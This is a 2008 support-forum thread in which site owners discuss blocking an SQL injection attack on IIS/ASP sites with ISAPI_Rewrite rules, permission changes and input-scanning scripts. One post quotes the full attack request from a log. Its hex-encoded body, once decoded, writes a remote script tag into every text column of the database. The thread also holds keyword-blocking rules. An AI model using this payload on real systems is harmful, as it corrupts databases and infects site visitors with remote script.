Active TopicsActive Topics  Display List of Forum MembersMemberlist  HelpHelp   RegisterRegister  LoginLogin
ISAPI_Rewrite 2.x support forum
 Helicon Tech : ISAPI_Rewrite 2.x support forum
Subject Topic: prevent SQL Injection hacks Post ReplyPost New Topic
Author
Message << Prev Topic | Next Topic >>
maven2707
Newbie
Newbie


Joined: 20 May 2007
Location: United Kingdom
Online Status: Offline
Posts: 6
Posted: 18 April 2008 at 12:21am | IP Logged Quote maven2707

Hello

Recently, my site is suffering from SQL Injection from hackers.

The hack is very clever and cloaked so it is difficult to find in the IIS logs.  I have now found a pattern and want to find a way to identify this using ISAPI Rewrite so I can redirect the URL before any damage is done.

During a POST the following is added

POST /somepage.asp ID=1;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C0040004300200076006100720063006800610072002800320035003500290020004400450043004C0041005200450020005400610062006C0065005F0043007500720073006F0

How can I check for the DECLARE keyword in the URL string using ISAPI Rewrite?

thanks

 

Matthew

 
Back to Top View maven2707's Profile Search for other posts by maven2707
 
Yaroslav
Moderator Group
Moderator Group


Joined: 15 August 2002
Online Status: Offline
Posts: 6451
Posted: 21 April 2008 at 4:11am | IP Logged Quote Yaroslav
Rewriterule .*DECLARE\s.* http\://www.mysite.com/block.asp [I,R]

This will only work if keyword is present in query string or URL part, it will not work if parameters are passed as POST data in request body.

__________________
Yaroslav Govorunov,
Helicon Tech
Back to Top View Yaroslav's Profile Search for other posts by Yaroslav Visit Yaroslav's Homepage
 
maven2707
Newbie
Newbie


Joined: 20 May 2007
Location: United Kingdom
Online Status: Offline
Posts: 6
Posted: 21 April 2008 at 10:52am | IP Logged Quote maven2707

thanks for this.  Unfortunately this won't work as you suggested as the parameters are passed as POST.

Below is how the attack appears in the IIS Logs in case you have any further ideas.  Obviously I need to update my site with better validation but this is a lot of work and I was hoping ISAPIWRITE could have a fix for all solution.

POST /somefile.asp ID=123;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C0040004300200076006100720063006800610072002800320035003500290020004400450043004C0041005200450020005400610062006C0065005F0043007500720073006F007200200043005500520053004F005200200046004F0052002000730065006C00650063007400200061002E006E0061006D0065002C0062002E006E0061006D0065002000660072006F006D0020007300790073006F0062006A006500630074007300200061002C0073007900730063006F006C0075006D006E00730020006200200077006800650072006500200061002E00690064003D0062002E0069006400200061006E006400200061002E00780074007900700065003D00270075002700200061006E0064002000280062002E00780074007900700065003D003900390020006F007200200062002E00780074007900700065003D003300350020006F007200200062002E00780074007900700065003D0032003300310020006F007200200062002E00780074007900700065003D00310036003700290020004F00500045004E0020005400610062006C0065005F0043007500720073006F00720020004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C004000430020005700480049004C004500280040004000460045005400430048005F005300540041005400550053003D0030002900200042004500470049004E00200065007800650063002800270075007000640061007400650020005B0027002B00400054002B0027005D00200073006500740020005B0027002B00400043002B0027005D003D0072007400720069006D00280063006F006E007600650072007400280076006100720063006800610072002C005B0027002B00400043002B0027005D00290029002B00270027003C0073006300720069007000740020007300720063003D0068007400740070003A002F002F007700770077002E006E006900680061006F007200720031002E0063006F006D002F0031002E006A0073003E003C002F007300630072006900700074003E0027002700270029004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C0040004300200045004E004400200043004C004F005300450020005400610062006C0065005F0043007500720073006F00720020004400450041004C004C004F00430041005400450020005400610062006C0065005F0043007500720073006F007200%20AS%20NVARCHAR(4000));EXEC(@S);
Back to Top View maven2707's Profile Search for other posts by maven2707
 
Yaroslav
Moderator Group
Moderator Group


Joined: 15 August 2002
Online Status: Offline
Posts: 6451
Posted: 23 April 2008 at 4:51am | IP Logged Quote Yaroslav
Since the parameters appear in IIS log then they are passed as query string and can be matched by ISAPI_Rewrite. I made a typo in previous rule:

RewriteRule .*DECLARE.* http\://www.mysite.com/block.asp [I,R]

__________________
Yaroslav Govorunov,
Helicon Tech
Back to Top View Yaroslav's Profile Search for other posts by Yaroslav Visit Yaroslav's Homepage
 
Anson
Newbie
Newbie


Joined: 30 April 2008
Online Status: Offline
Posts: 1
Posted: 30 April 2008 at 3:59pm | IP Logged Quote Anson
The following worked for me.

RewriteCond %{query_string} declare%20
RewriteRule !403\.html$ - [F]

I think I'm going to redirect for "sp_password" also.

The next step will be to create a page that sends / logs an alert and bans the IP for a few hours.
Back to Top View Anson's Profile Search for other posts by Anson
 
jhoskins
Newbie
Newbie


Joined: 14 May 2008
Location: United States
Online Status: Offline
Posts: 1
Posted: 14 May 2008 at 9:03am | IP Logged Quote jhoskins
So will the solutions above or the product itself have the ability to combat POST Requests?

Yaroslav?
Back to Top View jhoskins's Profile Search for other posts by jhoskins
 
Yaroslav
Moderator Group
Moderator Group


Joined: 15 August 2002
Online Status: Offline
Posts: 6451
Posted: 15 May 2008 at 4:45am | IP Logged Quote Yaroslav
No, ISAPI_Rewrite cannot analize request body. On the stage when body is downloaded from client it is too late to alter URL and change request handler on the server.

__________________
Yaroslav Govorunov,
Helicon Tech
Back to Top View Yaroslav's Profile Search for other posts by Yaroslav Visit Yaroslav's Homepage
 
rcoopman
Newbie
Newbie


Joined: 28 May 2008
Online Status: Offline
Posts: 2
Posted: 28 May 2008 at 12:23pm | IP Logged Quote rcoopman
Convert the hex to text using this tool: http://www.string-functions.com/hex-string.aspx and you will notice that they are using the sysobjects / syscolumns to dio massive damage to multiple tables. Try disabling permissions to these tables...
Back to Top View rcoopman's Profile Search for other posts by rcoopman
 
rcoopman
Newbie
Newbie


Joined: 28 May 2008
Online Status: Offline
Posts: 2
Posted: 28 May 2008 at 12:46pm | IP Logged Quote rcoopman

Another approach that can be useful as a catch all sql shield is to create an include file with a function to iterate the request.form and request.querystring collections and scan for any potential  attacks. Then you can just place the include at the top of the page and have it scan each time a page is loaded. This can also be used for scanning the cookies, sessions and so forth.

As far as using isapi rewrite, you could potentialy have every request to your site first go to a page with a sql shield script like i just described, and if it passes the script then you could server.transfer to the originally requested page with all the qs/form stuff intact. If it doesn't pass the sql shield, no soup for you.
Back to Top View rcoopman's Profile Search for other posts by rcoopman
 

If you wish to post a reply to this topic you must first login
If you are not already registered you must first register

  Post ReplyPost New Topic
Printable version Printable version

Forum Jump
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot delete your posts in this forum
You cannot edit your posts in this forum
You cannot create polls in this forum
You cannot vote in polls in this forum